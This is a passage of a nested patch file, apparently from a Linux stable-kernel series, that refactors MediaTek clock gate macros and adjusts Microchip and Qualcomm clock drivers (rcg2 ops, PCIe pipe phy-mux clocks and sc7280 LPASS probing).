+-		.ops = &mtk_clk_gate_ops_no_setclr,		\
+-	}
++#define GATE_AUD(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &aud_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
++
+ 
+ static const struct mtk_gate aud_clks[] __initconst = {
+ 	GATE_AUD(CLK_AUD_AFE, "aud_afe", "clk26m_ck", 2),
+diff --git a/drivers/clk/mediatek/clk-mt8167-img.c b/drivers/clk/mediatek/clk-mt8167-img.c
+index e359e563d2b79..4e7c0772b4f99 100644
+--- a/drivers/clk/mediatek/clk-mt8167-img.c
++++ b/drivers/clk/mediatek/clk-mt8167-img.c
+@@ -23,14 +23,8 @@ static const struct mtk_gate_regs img_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
+-#define GATE_IMG(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &img_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_IMG(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &img_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate img_clks[] __initconst = {
+ 	GATE_IMG(CLK_IMG_LARB1_SMI, "img_larb1_smi", "smi_mm", 0),
+diff --git a/drivers/clk/mediatek/clk-mt8167-mfgcfg.c b/drivers/clk/mediatek/clk-mt8167-mfgcfg.c
+index 4fd82fe87d6e5..192714498b2ec 100644
+--- a/drivers/clk/mediatek/clk-mt8167-mfgcfg.c
++++ b/drivers/clk/mediatek/clk-mt8167-mfgcfg.c
+@@ -23,14 +23,8 @@ static const struct mtk_gate_regs mfg_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
+-#define GATE_MFG(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &mfg_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_MFG(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &mfg_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate mfg_clks[] __initconst = {
+ 	GATE_MFG(CLK_MFG_BAXI, "mfg_baxi", "ahb_infra_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt8167-mm.c b/drivers/clk/mediatek/clk-mt8167-mm.c
+index 73910060577f6..a94961b7b8cc6 100644
+--- a/drivers/clk/mediatek/clk-mt8167-mm.c
++++ b/drivers/clk/mediatek/clk-mt8167-mm.c
+@@ -29,23 +29,11 @@ static const struct mtk_gate_regs mm1_cg_regs = {
+ 	.sta_ofs = 0x110,
+ };
+ 
+-#define GATE_MM0(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &mm0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
+-
+-#define GATE_MM1(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &mm1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_MM0(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &mm0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
++
++#define GATE_MM1(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &mm1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate mm_clks[] = {
+ 	/* MM0 */
+diff --git a/drivers/clk/mediatek/clk-mt8167-vdec.c b/drivers/clk/mediatek/clk-mt8167-vdec.c
+index ee4fffb6859da..38f0ba357d599 100644
+--- a/drivers/clk/mediatek/clk-mt8167-vdec.c
++++ b/drivers/clk/mediatek/clk-mt8167-vdec.c
+@@ -29,23 +29,11 @@ static const struct mtk_gate_regs vdec1_cg_regs = {
+ 	.sta_ofs = 0x8,
+ };
+ 
+-#define GATE_VDEC0_I(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &vdec0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_VDEC0_I(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &vdec0_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+-#define GATE_VDEC1_I(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &vdec1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_VDEC1_I(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &vdec1_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+ static const struct mtk_gate vdec_clks[] __initconst = {
+ 	/* VDEC0 */
+diff --git a/drivers/clk/mediatek/clk-mt8173-mm.c b/drivers/clk/mediatek/clk-mt8173-mm.c
+index 8abf42c2030c6..5826eabdc9c77 100644
+--- a/drivers/clk/mediatek/clk-mt8173-mm.c
++++ b/drivers/clk/mediatek/clk-mt8173-mm.c
+@@ -25,23 +25,11 @@ static const struct mtk_gate_regs mm1_cg_regs = {
+ 	.sta_ofs = 0x0110,
+ };
+ 
+-#define GATE_MM0(_id, _name, _parent, _shift) {			\
+-		.id = _id,					\
+-		.name = _name,					\
+-		.parent_name = _parent,				\
+-		.regs = &mm0_cg_regs,				\
+-		.shift = _shift,				\
+-		.ops = &mtk_clk_gate_ops_setclr,		\
+-	}
+-
+-#define GATE_MM1(_id, _name, _parent, _shift) {			\
+-		.id = _id,					\
+-		.name = _name,					\
+-		.parent_name = _parent,				\
+-		.regs = &mm1_cg_regs,				\
+-		.shift = _shift,				\
+-		.ops = &mtk_clk_gate_ops_setclr,		\
+-	}
++#define GATE_MM0(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &mm0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
++
++#define GATE_MM1(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &mm1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate mt8173_mm_clks[] = {
+ 	/* MM0 */
+diff --git a/drivers/clk/mediatek/clk-mt8516-aud.c b/drivers/clk/mediatek/clk-mt8516-aud.c
+index 90f48068a8de7..a3dafc719799c 100644
+--- a/drivers/clk/mediatek/clk-mt8516-aud.c
++++ b/drivers/clk/mediatek/clk-mt8516-aud.c
+@@ -22,14 +22,8 @@ static const struct mtk_gate_regs aud_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
+-#define GATE_AUD(_id, _name, _parent, _shift) {	\
+-		.id = _id,			\
+-		.name = _name,			\
+-		.parent_name = _parent,		\
+-		.regs = &aud_cg_regs,		\
+-		.shift = _shift,		\
+-		.ops = &mtk_clk_gate_ops_no_setclr,		\
+-	}
++#define GATE_AUD(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &aud_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+ static const struct mtk_gate aud_clks[] __initconst = {
+ 	GATE_AUD(CLK_AUD_AFE, "aud_afe", "clk26m_ck", 2),
+diff --git a/drivers/clk/mediatek/clk-mt8516.c b/drivers/clk/mediatek/clk-mt8516.c
+index b96db88893e23..056953d594c66 100644
+--- a/drivers/clk/mediatek/clk-mt8516.c
++++ b/drivers/clk/mediatek/clk-mt8516.c
+@@ -525,59 +525,23 @@ static const struct mtk_gate_regs top5_cg_regs = {
+ 	.sta_ofs = 0x44,
+ };
+ 
+-#define GATE_TOP1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_TOP1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_TOP2(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top2_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_TOP2(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top2_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_TOP2_I(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top2_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_TOP2_I(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &top2_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+-#define GATE_TOP3(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top3_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_TOP3(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top3_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_TOP4_I(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top4_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_TOP4_I(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &top4_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+-#define GATE_TOP5(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top5_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_TOP5(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top5_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate top_clks[] __initconst = {
+ 	/* TOP1 */
+diff --git a/drivers/clk/microchip/clk-mpfs.c b/drivers/clk/microchip/clk-mpfs.c
+index 4f0a19db7ed74..cc5d7dee59f06 100644
+--- a/drivers/clk/microchip/clk-mpfs.c
++++ b/drivers/clk/microchip/clk-mpfs.c
+@@ -374,14 +374,13 @@ static void mpfs_reset_unregister_adev(void *_adev)
+ 	struct auxiliary_device *adev = _adev;
+ 
+ 	auxiliary_device_delete(adev);
++	auxiliary_device_uninit(adev);
+ }
+ 
+ static void mpfs_reset_adev_release(struct device *dev)
+ {
+ 	struct auxiliary_device *adev = to_auxiliary_dev(dev);
+ 
+-	auxiliary_device_uninit(adev);
+-
+ 	kfree(adev);
+ }
+ 
+diff --git a/drivers/clk/qcom/dispcc-qcm2290.c b/drivers/clk/qcom/dispcc-qcm2290.c
+index 96b149365912a..24755dc841f9d 100644
+--- a/drivers/clk/qcom/dispcc-qcm2290.c
++++ b/drivers/clk/qcom/dispcc-qcm2290.c
+@@ -26,7 +26,6 @@ enum {
+ 	P_DISP_CC_PLL0_OUT_MAIN,
+ 	P_DSI0_PHY_PLL_OUT_BYTECLK,
+ 	P_DSI0_PHY_PLL_OUT_DSICLK,
+-	P_DSI1_PHY_PLL_OUT_DSICLK,
+ 	P_GPLL0_OUT_MAIN,
+ 	P_SLEEP_CLK,
+ };
+@@ -71,7 +70,6 @@ static const struct parent_map disp_cc_parent_map_0[] = {
+ static const struct clk_parent_data disp_cc_parent_data_0[] = {
+ 	{ .fw_name = "bi_tcxo" },
+ 	{ .fw_name = "dsi0_phy_pll_out_byteclk" },
+-	{ .fw_name = "core_bi_pll_test_se" },
+ };
+ 
+ static const struct parent_map disp_cc_parent_map_1[] = {
+@@ -80,7 +78,6 @@ static const struct parent_map disp_cc_parent_map_1[] = {
+ 
+ static const struct clk_parent_data disp_cc_parent_data_1[] = {
+ 	{ .fw_name = "bi_tcxo" },
+-	{ .fw_name = "core_bi_pll_test_se" },
+ };
+ 
+ static const struct parent_map disp_cc_parent_map_2[] = {
+@@ -91,7 +88,6 @@ static const struct parent_map disp_cc_parent_map_2[] = {
+ static const struct clk_parent_data disp_cc_parent_data_2[] = {
+ 	{ .fw_name = "bi_tcxo_ao" },
+ 	{ .fw_name = "gcc_disp_gpll0_div_clk_src" },
+-	{ .fw_name = "core_bi_pll_test_se" },
+ };
+ 
+ static const struct parent_map disp_cc_parent_map_3[] = {
+@@ -104,20 +100,16 @@ static const struct clk_parent_data disp_cc_parent_data_3[] = {
+ 	{ .fw_name = "bi_tcxo" },
+ 	{ .hw = &disp_cc_pll0.clkr.hw },
+ 	{ .fw_name = "gcc_disp_gpll0_clk_src" },
+-	{ .fw_name = "core_bi_pll_test_se" },
+ };
+ 
+ static const struct parent_map disp_cc_parent_map_4[] = {
+ 	{ P_BI_TCXO, 0 },
+ 	{ P_DSI0_PHY_PLL_OUT_DSICLK, 1 },
+-	{ P_DSI1_PHY_PLL_OUT_DSICLK, 2 },
+ };
+ 
+ static const struct clk_parent_data disp_cc_parent_data_4[] = {
+ 	{ .fw_name = "bi_tcxo" },
+ 	{ .fw_name = "dsi0_phy_pll_out_dsiclk" },
+-	{ .fw_name = "dsi1_phy_pll_out_dsiclk" },
+-	{ .fw_name = "core_bi_pll_test_se" },
+ };
+ 
+ static const struct parent_map disp_cc_parent_map_5[] = {
+@@ -126,7 +118,6 @@ static const struct parent_map disp_cc_parent_map_5[] = {
+ 
+ static const struct clk_parent_data disp_cc_parent_data_5[] = {
+ 	{ .fw_name = "sleep_clk" },
+-	{ .fw_name = "core_bi_pll_test_se" },
+ };
+ 
+ static struct clk_rcg2 disp_cc_mdss_byte0_clk_src = {
+diff --git a/drivers/clk/qcom/gcc-qcm2290.c b/drivers/clk/qcom/gcc-qcm2290.c
+index 7792b8f237047..096deff2ba257 100644
+--- a/drivers/clk/qcom/gcc-qcm2290.c
++++ b/drivers/clk/qcom/gcc-qcm2290.c
+@@ -1243,7 +1243,8 @@ static struct clk_rcg2 gcc_sdcc2_apps_clk_src = {
+ 		.name = "gcc_sdcc2_apps_clk_src",
+ 		.parent_data = gcc_parents_12,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_12),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_floor_ops,
++		.flags = CLK_OPS_PARENT_ENABLE,
+ 	},
+ };
+ 
+diff --git a/drivers/clk/qcom/gcc-sm6115.c b/drivers/clk/qcom/gcc-sm6115.c
+index 565f9912039fe..631419caf695a 100644
+--- a/drivers/clk/qcom/gcc-sm6115.c
++++ b/drivers/clk/qcom/gcc-sm6115.c
+@@ -694,7 +694,7 @@ static struct clk_rcg2 gcc_camss_axi_clk_src = {
+ 		.parent_data = gcc_parents_7,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_7),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -715,7 +715,7 @@ static struct clk_rcg2 gcc_camss_cci_clk_src = {
+ 		.parent_data = gcc_parents_9,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_9),
+ 		.flags = CLK_SET_RATE_PARENT | CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -738,7 +738,7 @@ static struct clk_rcg2 gcc_camss_csi0phytimer_clk_src = {
+ 		.parent_data = gcc_parents_4,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_4),
+ 		.flags = CLK_SET_RATE_PARENT | CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -753,7 +753,7 @@ static struct clk_rcg2 gcc_camss_csi1phytimer_clk_src = {
+ 		.parent_data = gcc_parents_4,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_4),
+ 		.flags = CLK_SET_RATE_PARENT | CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -768,7 +768,7 @@ static struct clk_rcg2 gcc_camss_csi2phytimer_clk_src = {
+ 		.parent_data = gcc_parents_4,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_4),
+ 		.flags = CLK_SET_RATE_PARENT | CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -790,7 +790,7 @@ static struct clk_rcg2 gcc_camss_mclk0_clk_src = {
+ 		.parent_data = gcc_parents_3,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_3),
+ 		.flags = CLK_SET_RATE_PARENT | CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -805,7 +805,7 @@ static struct clk_rcg2 gcc_camss_mclk1_clk_src = {
+ 		.parent_data = gcc_parents_3,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_3),
+ 		.flags = CLK_SET_RATE_PARENT | CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -820,7 +820,7 @@ static struct clk_rcg2 gcc_camss_mclk2_clk_src = {
+ 		.parent_data = gcc_parents_3,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_3),
+ 		.flags = CLK_SET_RATE_PARENT | CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -835,7 +835,7 @@ static struct clk_rcg2 gcc_camss_mclk3_clk_src = {
+ 		.parent_data = gcc_parents_3,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_3),
+ 		.flags = CLK_SET_RATE_PARENT | CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -857,7 +857,7 @@ static struct clk_rcg2 gcc_camss_ope_ahb_clk_src = {
+ 		.parent_data = gcc_parents_8,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_8),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -881,7 +881,7 @@ static struct clk_rcg2 gcc_camss_ope_clk_src = {
+ 		.parent_data = gcc_parents_8,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_8),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -916,7 +916,7 @@ static struct clk_rcg2 gcc_camss_tfe_0_clk_src = {
+ 		.parent_data = gcc_parents_5,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_5),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -941,7 +941,7 @@ static struct clk_rcg2 gcc_camss_tfe_0_csid_clk_src = {
+ 		.parent_data = gcc_parents_6,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_6),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -956,7 +956,7 @@ static struct clk_rcg2 gcc_camss_tfe_1_clk_src = {
+ 		.parent_data = gcc_parents_5,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_5),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -971,7 +971,7 @@ static struct clk_rcg2 gcc_camss_tfe_1_csid_clk_src = {
+ 		.parent_data = gcc_parents_6,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_6),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -986,7 +986,7 @@ static struct clk_rcg2 gcc_camss_tfe_2_clk_src = {
+ 		.parent_data = gcc_parents_5,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_5),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1001,7 +1001,7 @@ static struct clk_rcg2 gcc_camss_tfe_2_csid_clk_src = {
+ 		.parent_data = gcc_parents_6,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_6),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1024,7 +1024,7 @@ static struct clk_rcg2 gcc_camss_tfe_cphy_rx_clk_src = {
+ 		.parent_data = gcc_parents_10,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_10),
+ 		.flags = CLK_SET_RATE_PARENT | CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1046,7 +1046,7 @@ static struct clk_rcg2 gcc_camss_top_ahb_clk_src = {
+ 		.parent_data = gcc_parents_7,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_7),
+ 		.flags = CLK_SET_RATE_PARENT | CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1116,7 +1116,7 @@ static struct clk_rcg2 gcc_pdm2_clk_src = {
+ 		.name = "gcc_pdm2_clk_src",
+ 		.parent_data = gcc_parents_0,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_0),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1329,7 +1329,7 @@ static struct clk_rcg2 gcc_ufs_phy_axi_clk_src = {
+ 		.name = "gcc_ufs_phy_axi_clk_src",
+ 		.parent_data = gcc_parents_0,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_0),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1351,7 +1351,7 @@ static struct clk_rcg2 gcc_ufs_phy_ice_core_clk_src = {
+ 		.name = "gcc_ufs_phy_ice_core_clk_src",
+ 		.parent_data = gcc_parents_0,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_0),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1392,7 +1392,7 @@ static struct clk_rcg2 gcc_ufs_phy_unipro_core_clk_src = {
+ 		.name = "gcc_ufs_phy_unipro_core_clk_src",
+ 		.parent_data = gcc_parents_0,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_0),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1414,7 +1414,7 @@ static struct clk_rcg2 gcc_usb30_prim_master_clk_src = {
+ 		.name = "gcc_usb30_prim_master_clk_src",
+ 		.parent_data = gcc_parents_0,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_0),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1483,7 +1483,7 @@ static struct clk_rcg2 gcc_video_venus_clk_src = {
+ 		.parent_data = gcc_parents_13,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_13),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+diff --git a/drivers/clk/qcom/gcc-sm8350.c b/drivers/clk/qcom/gcc-sm8350.c
+index c3731f96c8e6b..430ef407a8341 100644
+--- a/drivers/clk/qcom/gcc-sm8350.c
++++ b/drivers/clk/qcom/gcc-sm8350.c
+@@ -17,6 +17,7 @@
+ #include "clk-regmap.h"
+ #include "clk-regmap-divider.h"
+ #include "clk-regmap-mux.h"
++#include "clk-regmap-phy-mux.h"
+ #include "gdsc.h"
+ #include "reset.h"
+ 
+@@ -167,26 +168,6 @@ static const struct clk_parent_data gcc_parent_data_3[] = {
+ 	{ .fw_name = "core_bi_pll_test_se" },
+ };
+ 
+-static const struct parent_map gcc_parent_map_4[] = {
+-	{ P_PCIE_0_PIPE_CLK, 0 },
+-	{ P_BI_TCXO, 2 },
+-};
+-
+-static const struct clk_parent_data gcc_parent_data_4[] = {
+-	{ .fw_name = "pcie_0_pipe_clk", },
+-	{ .fw_name = "bi_tcxo" },
+-};
+-
+-static const struct parent_map gcc_parent_map_5[] = {
+-	{ P_PCIE_1_PIPE_CLK, 0 },
+-	{ P_BI_TCXO, 2 },
+-};
+-
+-static const struct clk_parent_data gcc_parent_data_5[] = {
+-	{ .fw_name = "pcie_1_pipe_clk" },
+-	{ .fw_name = "bi_tcxo" },
+-};
+-
+ static const struct parent_map gcc_parent_map_6[] = {
+ 	{ P_BI_TCXO, 0 },
+ 	{ P_GCC_GPLL0_OUT_MAIN, 1 },
+@@ -289,32 +270,30 @@ static const struct clk_parent_data gcc_parent_data_14[] = {
+ 	{ .fw_name = "bi_tcxo" },
+ };
+ 
+-static struct clk_regmap_mux gcc_pcie_0_pipe_clk_src = {
++static struct clk_regmap_phy_mux gcc_pcie_0_pipe_clk_src = {
+ 	.reg = 0x6b054,
+-	.shift = 0,
+-	.width = 2,
+-	.parent_map = gcc_parent_map_4,
+ 	.clkr = {
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_pcie_0_pipe_clk_src",
+-			.parent_data = gcc_parent_data_4,
+-			.num_parents = ARRAY_SIZE(gcc_parent_data_4),
+-			.ops = &clk_regmap_mux_closest_ops,
++			.parent_data = &(const struct clk_parent_data){
++				.fw_name = "pcie_0_pipe_clk",
++			},
++			.num_parents = 1,
++			.ops = &clk_regmap_phy_mux_ops,
+ 		},
+ 	},
+ };
+ 
+-static struct clk_regmap_mux gcc_pcie_1_pipe_clk_src = {
++static struct clk_regmap_phy_mux gcc_pcie_1_pipe_clk_src = {
+ 	.reg = 0x8d054,
+-	.shift = 0,
+-	.width = 2,
+-	.parent_map = gcc_parent_map_5,
+ 	.clkr = {
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_pcie_1_pipe_clk_src",
+-			.parent_data = gcc_parent_data_5,
+-			.num_parents = ARRAY_SIZE(gcc_parent_data_5),
+-			.ops = &clk_regmap_mux_closest_ops,
++			.parent_data = &(const struct clk_parent_data){
++				.fw_name = "pcie_1_pipe_clk",
++			},
++			.num_parents = 1,
++			.ops = &clk_regmap_phy_mux_ops,
+ 		},
+ 	},
+ };
+diff --git a/drivers/clk/qcom/lpassaudiocc-sc7280.c b/drivers/clk/qcom/lpassaudiocc-sc7280.c
+index 1339f9211a149..134eb1529ede2 100644
+--- a/drivers/clk/qcom/lpassaudiocc-sc7280.c
++++ b/drivers/clk/qcom/lpassaudiocc-sc7280.c
+@@ -696,6 +696,8 @@ static const struct qcom_cc_desc lpass_cc_sc7280_desc = {
+ 	.config = &lpass_audio_cc_sc7280_regmap_config,
+ 	.clks = lpass_cc_sc7280_clocks,
+ 	.num_clks = ARRAY_SIZE(lpass_cc_sc7280_clocks),
++	.gdscs = lpass_aon_cc_sc7280_gdscs,
++	.num_gdscs = ARRAY_SIZE(lpass_aon_cc_sc7280_gdscs),
+ };
+ 
+ static const struct qcom_cc_desc lpass_audio_cc_sc7280_desc = {
+diff --git a/drivers/clk/qcom/lpasscc-sc7280.c b/drivers/clk/qcom/lpasscc-sc7280.c
+index 5c1e17bd0d763..8486d7135ab10 100644
+--- a/drivers/clk/qcom/lpasscc-sc7280.c
++++ b/drivers/clk/qcom/lpasscc-sc7280.c
+@@ -118,14 +118,18 @@ static int lpass_cc_sc7280_probe(struct platform_device *pdev)
+ 		goto destroy_pm_clk;
+ 	}
+ 
+-	lpass_regmap_config.name = "qdsp6ss";
+-	desc = &lpass_qdsp6ss_sc7280_desc;
+-
+-	ret = qcom_cc_probe_by_index(pdev, 0, desc);
+-	if (ret)
+-		goto destroy_pm_clk;
++	if (!of_property_read_bool(pdev->dev.of_node, "qcom,adsp-pil-mode")) {
++		lpass_regmap_config.name = "qdsp6ss";
++		lpass_regmap_config.max_register = 0x3f;
++		desc = &lpass_qdsp6ss_sc7280_desc;
++
++		ret = qcom_cc_probe_by_index(pdev, 0, desc);
++		if (ret)
++			goto destroy_pm_clk;
++	}
+ 
+ 	lpass_regmap_config.name = "top_cc";
++	lpass_regmap_config.max_register = 0x4;
